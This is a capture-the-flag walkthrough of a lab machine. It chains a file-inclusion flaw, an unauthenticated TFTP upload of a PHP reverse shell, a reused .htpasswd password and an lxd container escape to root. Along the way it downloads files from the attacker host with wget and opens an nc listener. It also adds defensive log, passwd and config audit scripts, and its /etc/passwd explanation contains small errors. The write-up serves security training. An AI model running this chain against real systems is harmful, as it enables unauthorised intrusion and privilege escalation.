
Included (VIP only)

  • Admin
  • May 1, 2022
  • 3 min read

Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.129.166.191

Let's also do a UDP scan using:

sudo nmap -sU 10.129.166.191

Enter your password when prompted.

UDP scans take a lot longer than the usual TCP scans, so be patient. Also, UDP scans require sudo.

Note that UDP port 69 is open, which is associated with TFTP.


Port 80 is open, so let's check the website by going to http://10.129.166.191

Even though I typed http://10.129.166.191, I got redirected to http://10.129.166.191/?file=home.php


This looks like file inclusion, which explains the name of the machine, "Included".


Let's try it. Let's see if we can access the file /etc/passwd using http://10.129.166.191/?file=/etc/passwd


Great!


Using curl, we get a cleaner display of the users:

curl http://10.129.166.191/?file=/etc/passwd
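From the defender's side, the two requests above (a redirect to ?file=home.php followed by ?file=/etc/passwd) are exactly the pattern a web log review should catch. The script below is an added example, not code from the original post: it parses a few constructed Apache combined-format log lines and flags any value of the file parameter that is an absolute path, a traversal sequence (including URL-encoded), a null byte, or anything outside a small allowlist of pages. The allowlist (home.php, about.php) and the log lines are assumptions made up for the example; resolving the parameter against a fixed map like that allowlist, rather than passing it to include(), is also the shape of the fix.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format; not real traffic
# from the target. Two are ordinary page loads, three are inclusion attempts.
SAMPLE_LOG = """\
10.10.14.82 - - [01/May/2022:10:00:01 +0000] "GET /?file=home.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.10.14.82 - - [01/May/2022:10:00:05 +0000] "GET /?file=/etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.81.0"
10.10.14.82 - - [01/May/2022:10:00:09 +0000] "GET /?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "curl/7.81.0"
10.10.14.82 - - [01/May/2022:10:01:30 +0000] "GET /?file=/var/lib/tftpboot/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.82 - - [01/May/2022:10:02:00 +0000] "GET /?file=about.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Query parameter(s) the page uses to choose which file to include.
INCLUDE_PARAMS = ("file",)
# Assumed allowlist of pages the application legitimately serves.
ALLOWED_PAGES = {"home.php", "about.php"}


def classify_value(value: str) -> Optional[str]:
    """Return why `value` looks like an inclusion attempt, or None if it is benign."""
    decoded = unquote(value)  # parse_qs decoded once already; this catches double encoding
    if "\x00" in decoded:
        return "null byte"
    if decoded.startswith("/"):
        return "absolute path"
    if ".." in decoded.replace("\\", "/"):
        return "directory traversal"
    if decoded not in ALLOWED_PAGES:
        return "value outside allowlist"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse each log line and report requests whose include parameter is suspicious."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real tool would count these
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for param in INCLUDE_PARAMS:
            for value in query.get(param, []):
                reason = classify_value(value)
                if reason is not None:
                    findings.append({
                        "ip": m["ip"], "time": m["ts"], "param": param,
                        "value": value, "reason": reason,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['param']}={f['value']!r}: {f['reason']}")
```

Run against the constructed sample it reports three of the five requests; the allowlist check is deliberately last so that an unknown but harmless-looking value is still surfaced, just with a weaker reason.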

What is the /etc/passwd file?

  • The /etc/passwd file keeps track of all the registered users on the system. It is a colon-separated (:) file.

  • It contains, in this order: user name, encrypted password, UID, GID, user home directory, login shell.

  • The file /etc/passwd is owned by the root user but must be readable by all users. Only root can write to this file.

  • The encrypted passwords are stored in the /etc/security/passwd file.
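The "nicer display of users" the curl output gives is easy to turn into a structured view. The Python below is an added example, not part of the original post: it parses the seven colon-separated fields of the passwd format (name, password, UID, GID, the comment/GECOS field, home directory, shell), lists the accounts that have a real login shell, and runs the checks an administrator would want on this file: a hash sitting in the password field instead of the usual x, an empty password field, a second UID 0 account, or a duplicated UID. The sample file content is constructed for the example, and the legacy line is deliberately wrong so the audit has something to find.

```python
from typing import Dict, List, Tuple

# Constructed sample in /etc/passwd format; not the target's real file. The
# "legacy" line is deliberately malformed for the audit: it carries a hash in
# the password field instead of the usual "x".
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tftp:x:112:117:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
mike:x:1000:1000:mike,,,:/home/mike:/bin/bash
legacy:$6$saltsalt$HASHPLACEHOLDER:1001:1001::/home/legacy:/bin/sh
"""

# The seven colon-separated fields, in file order.
FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Parse passwd-format text into one dict per account; rejects malformed lines."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            raise ValueError(f"line {lineno}: expected {len(FIELDS)} fields, got {len(parts)}")
        entry: Dict[str, object] = dict(zip(FIELDS, parts))
        entry["uid"] = int(parts[2])
        entry["gid"] = int(parts[3])
        entries.append(entry)
    return entries


def interactive_users(entries: List[Dict[str, object]]) -> List[str]:
    """Accounts with a real login shell, i.e. the ones that can actually log in."""
    return [str(e["name"]) for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def audit(entries: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Flag the classic passwd-file problems; returns (account, problem) pairs."""
    findings = []
    seen_uid: Dict[int, str] = {}
    for e in entries:
        name, pw, uid = str(e["name"]), str(e["password"]), int(e["uid"])
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in ("x", "*", "!", "!!"):
            findings.append((name, "password hash stored in /etc/passwd instead of the shadow file"))
        if uid == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if uid in seen_uid:
            findings.append((name, f"uid {uid} already used by {seen_uid[uid]}"))
        else:
            seen_uid[uid] = name
    return findings


if __name__ == "__main__":
    accounts = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", ", ".join(interactive_users(accounts)))
    for account, problem in audit(accounts):
        print(f"{account}: {problem}")
```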



Earlier, the UDP scan showed that port 69/udp is open, which is associated with TFTP.


Let's install tftp first using:

sudo apt install tftp

Once installed, type:

tftp 10.129.166.191

By default TFTP works without any authentication, meaning that anyone can upload and download files from the remote system!


Foothold


Open a new command prompt window and type:

locate webshells

cd /usr/share/webshells/php

ls

We are interested in php-reverse-shell.php. Let's make a copy first, called shell.php:

sudo cp php-reverse-shell.php shell.php
ls

Let's now move shell.php to our home directory

sudo mv shell.php /home/htb-sneakymouse/

(Your home directory will be different.)

Now open a new command prompt window and type:

ls

We can see that shell.php is now in our home directory.


Now let's edit this shell.php file using:

sudo nano shell.php

Scroll down until you see the $ip and $port variables.

We need to change $ip to the IP of our VM.

If you don't know the IP of your VM, open a new command prompt window and type ifconfig.

We need to change $port to 4444 (this is because we will set up our netcat listener on port 4444).

When done, press Ctrl+X, then Y, then Enter to save and exit.


Now that we have shell.php ready, we need to upload it to the target using tftp. Go back to your tftp session and type:

put shell.php

Make sure you started the tftp session from your home directory, since that is where shell.php now lives and where put reads it from.

Now that we have uploaded our file we can just quit:

quit

Now let's open a new command prompt window and set up our netcat listener on port 4444

nc -lnvp 4444

Now browse to http://10.129.166.191/?file=/var/lib/tftpboot/shell.php

Nothing appears in the browser, but the request makes the server include and run shell.php. Go back to your netcat window and you should have a connection.

We got the shell! Let's upgrade the shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ls
whoami

cd home
ls

cd mike
ls
cat user.txt

We are www-data, and we are not allowed to read user.txt in mike's directory.



Lateral movement


Let's look for some credentials in:

cd /var/www/html

ls -al

.htpasswd is where the password for the website is stored:

cat .htpasswd

We got the password! Maybe mike is using the same password to access the system

Sheffield19


su mike

When prompted for the password, type:

Sheffield19

We got in, and we are now mike.

id

cd /home
ls
cd mike
ls
cat user.txt

Congratulations! You got the user flag!


a56ef91d70cfbf2cdb8f454c006935a1



Privilege escalation

sudo -l

mike was not granted sudo rights on the machine.

id

The id output shows that mike belongs to the lxd group. Let's google lxd and lxd privilege escalation. We find that we can escalate our privileges using lxd. With lxd we can run system containers; a system container is like a full OS, almost like a VM.


From your VM, open a new command prompt window and follow the steps below:

sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

--> this installs the Go programming language along with some other required packages


git clone https://github.com/lxc/distrobuilder

--> this downloads a copy of distrobuilder. We need distrobuilder to create container images for lxd

cd distrobuilder

make

--> distrobuilder has been built successfully!



Create a new directory called ContainerImages and a directory inside it called alpine using:

mkdir ContainerImages
cd ContainerImages
mkdir alpine
cd alpine

Let's also download the alpine.yaml file using:

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

ls

Let's now build it:

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

When done, list the directory:

ls

We now have lxd.tar.xz and rootfs.squashfs.


Let's create a web service on port 8000 on our VM using:

python3 -m http.server 8000

Now let's switch back to the shell on the target.

Type:

cd /tmp

wget http://10.10.14.82:8000/rootfs.squashfs

--> this retrieves rootfs.squashfs from the web server we just started on our VM and saves it on the target machine

wget http://10.10.14.82:8000/lxd.tar.xz

--> this retrieves lxd.tar.xz from the same web server and saves it on the target machine

ls

Now the files are on the target machine!


lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

--> this imports the image under the alias alpine

lxc image list

--> we use this command to make sure the image has been imported properly


lxc init alpine privesc -c security.privileged=true

lxc list

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc

lxc exec privesc /bin/sh

We got a shell! Not the prettiest shell, but it will do.
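Both weaknesses this box chains together, the TFTP service found during Enumeration that accepts uploads without authentication, and the lxd group membership that makes this privilege escalation possible, are host configuration issues an administrator can check for directly. The Python below is an added example and not part of the original post: it reads constructed samples of /etc/default/tftpd-hpa (assuming the tftpd-hpa daemon, whose --create option is what permits clients to create new files in the TFTP directory) and /etc/group, and reports both conditions. The file contents are made up for the example; on a real host the two functions would be fed the actual files.

```python
import shlex
from typing import Dict, List

# Constructed sample of /etc/default/tftpd-hpa (assumes the tftpd-hpa daemon).
# "--create" lets clients create new files, i.e. upload into TFTP_DIRECTORY;
# without it the daemon only allows downloads and overwrites of existing files.
SAMPLE_TFTPD_DEFAULT = """\
# /etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/var/lib/tftpboot"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="--secure --create"
"""

# Constructed sample of /etc/group: name:password:gid:member,member
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
lxd:x:108:mike
docker:x:999:
mike:x:1000:
"""

# Groups whose members can reach root without a sudo rule; for lxd this is
# exactly the privileged-container route used above.
ROOT_EQUIVALENT_GROUPS = ("sudo", "lxd", "docker")


def parse_shell_assignments(text: str) -> Dict[str, str]:
    """Read KEY="value" lines as a shell would (quotes stripped, comments ignored)."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, raw = line.partition("=")
        values[key.strip()] = " ".join(shlex.split(raw))
    return values


def tftp_upload_enabled(defaults_text: str) -> bool:
    """True when TFTP_OPTIONS contains the create flag (-c / --create)."""
    opts = shlex.split(parse_shell_assignments(defaults_text).get("TFTP_OPTIONS", ""))
    return "--create" in opts or "-c" in opts


def parse_group(text: str) -> Dict[str, List[str]]:
    """Map group name -> supplementary members (primary-group membership is not listed here)."""
    groups = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _pw, _gid, members = line.split(":")
        groups[name] = [m for m in members.split(",") if m]
    return groups


def root_equivalent_members(group_text: str) -> Dict[str, List[str]]:
    """Only the root-equivalent groups that actually have members."""
    groups = parse_group(group_text)
    return {g: groups[g] for g in ROOT_EQUIVALENT_GROUPS if groups.get(g)}


def check_host(defaults_text: str, group_text: str) -> List[str]:
    """Human-readable findings for the two misconfigurations this box relies on."""
    findings = []
    if tftp_upload_enabled(defaults_text):
        directory = parse_shell_assignments(defaults_text).get("TFTP_DIRECTORY", "?")
        findings.append(f"tftpd-hpa allows unauthenticated uploads into {directory}")
    for group, members in root_equivalent_members(group_text).items():
        findings.append(f"group {group} grants root-equivalent access to: {', '.join(members)}")
    return findings


if __name__ == "__main__":
    for finding in check_host(SAMPLE_TFTPD_DEFAULT, SAMPLE_GROUP):
        print(finding)
```

Dropping --create from TFTP_OPTIONS (or not running a TFTP server at all where nothing needs it) removes the upload path, and taking mike out of the lxd group removes the escalation; the LXD project's own documentation treats lxd group membership as equivalent to root on the host, which is why the group is on the list.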


cd /mnt/root/root

cat root.txt

Congratulations! You got the root flag!


cc693d9c7499d9f572ee375d4c14c7bcfca



 
 
 
